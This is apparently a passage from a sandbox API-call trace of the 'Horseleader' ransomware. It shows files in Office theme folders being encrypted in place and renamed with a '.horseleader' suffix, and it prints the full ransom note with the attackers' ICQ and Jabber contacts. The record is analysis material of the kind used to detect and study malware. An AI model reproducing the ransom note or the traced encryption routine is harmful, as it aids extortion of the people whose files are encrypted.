lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.744] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.744] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.744] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x10ce, lpOverlapped=0x0) returned 1 [0246.744] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffef32, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.744] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x10ce, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x10ce, lpOverlapped=0x0) returned 1 [0246.744] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.744] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.744] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.744] CloseHandle (hObject=0x1a4) returned 1 [0246.744] GetProcessHeap () returned 0x780000 [0246.745] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.745] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM.horseleader") returned 85 [0246.745] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\echo.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\echo.elm.horseleader")) returned 1 [0246.745] GetProcessHeap () returned 0x780000 [0246.745] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.746] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x608b7590, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1f7, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="ECHO.INF", cAlternateFileName="")) returned 1 [0246.746] lstrcmpiW (lpString1="ECHO.INF", lpString2="Windows") returned -1 [0246.746] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF") returned 73 [0246.746] StrStrIW (lpFirst="ECHO.INF", lpSrch=".horseleader") returned 0x0 [0246.746] lstrcmpW (lpString1="ECHO.INF", lpString2="#Decrypt#.txt") returned 1 [0246.746] lstrcmpW (lpString1="ECHO.INF", lpString2="_uninstalling_.png") returned 1 [0246.746] lstrlenW (lpString=".testttjffg") returned 11 [0246.746] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF", lpSrch=".testttjffg") returned 0x0 [0246.746] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.746] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.746] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\echo.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.746] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF") returned 73 [0246.746] StrStrW (lpFirst="ECHO.INF", lpSrch=".txt") returned 0x0 [0246.746] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=503) returned 1 [0246.747] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1f7, lpOverlapped=0x0) returned 1 [0246.748] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe09, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.748] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1f7, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1f7, lpOverlapped=0x0) returned 1 [0246.748] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.748] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.748] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.748] CloseHandle (hObject=0x1a4) returned 1 [0246.748] GetProcessHeap () returned 0x780000 [0246.748] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.748] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF.horseleader") returned 85 [0246.748] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\echo.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\echo.inf.horseleader")) returned 1 [0246.751] GetProcessHeap () returned 0x780000 [0246.751] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.751] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6f8e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x5ad, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0246.751] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0246.751] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 76 [0246.751] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0246.751] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0246.751] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0246.751] lstrlenW (lpString=".testttjffg") returned 11 [0246.751] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0246.751] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.752] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.752] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.752] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 76 [0246.752] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0246.752] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1453) returned 1 [0246.752] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5ad, lpOverlapped=0x0) returned 1 [0246.880] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffa53, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.880] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5ad, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5ad, lpOverlapped=0x0) returned 1 [0246.880] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.881] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.881] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.881] CloseHandle (hObject=0x1a4) returned 1 [0246.881] GetProcessHeap () returned 0x780000 [0246.881] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.881] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF.horseleader") returned 88 [0246.882] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif.horseleader")) returned 1 [0246.883] GetProcessHeap () returned 0x780000 [0246.883] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.883] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x6212, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.883] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.883] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 77 [0246.883] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0246.883] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.883] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.883] lstrlenW (lpString=".testttjffg") returned 11 [0246.883] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.883] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.883] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.884] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.884] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 77 [0246.884] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.884] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=25106) returned 1 [0246.885] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.891] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.891] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.891] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1212, lpOverlapped=0x0) returned 1 [0246.892] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffedee, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.892] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1212, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1212, lpOverlapped=0x0) returned 1 [0246.892] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.892] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.892] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.892] CloseHandle (hObject=0x1a4) returned 1 [0246.892] GetProcessHeap () returned 0x780000 [0246.893] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.893] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG.horseleader") returned 89 [0246.893] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png.horseleader")) returned 1 [0246.894] GetProcessHeap () returned 0x780000 [0246.894] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.894] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x6212, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.894] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0246.894] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\#Decrypt#.txt") returned 78 [0246.894] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.895] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0246.895] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.896] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0246.896] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.896] CloseHandle (hObject=0x158) returned 1 [0246.896] GetProcessHeap () returned 0x780000 [0246.896] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.897] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e3fe90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ECLIPSE", cAlternateFileName="")) returned 1 [0246.897] lstrcmpiW (lpString1="ECLIPSE", lpString2="Windows") returned -1 [0246.897] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE") returned 67 [0246.897] lstrcmpW (lpString1="ECLIPSE", lpString2=".") returned 1 [0246.897] lstrcmpW (lpString1="ECLIPSE", lpString2="..") returned 1 [0246.897] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.897] GetProcessHeap () returned 0x780000 [0246.897] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.897] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\*") returned 69 [0246.897] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e3fe90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.898] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.898] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\.") returned 69 [0246.898] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.898] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e3fe90, 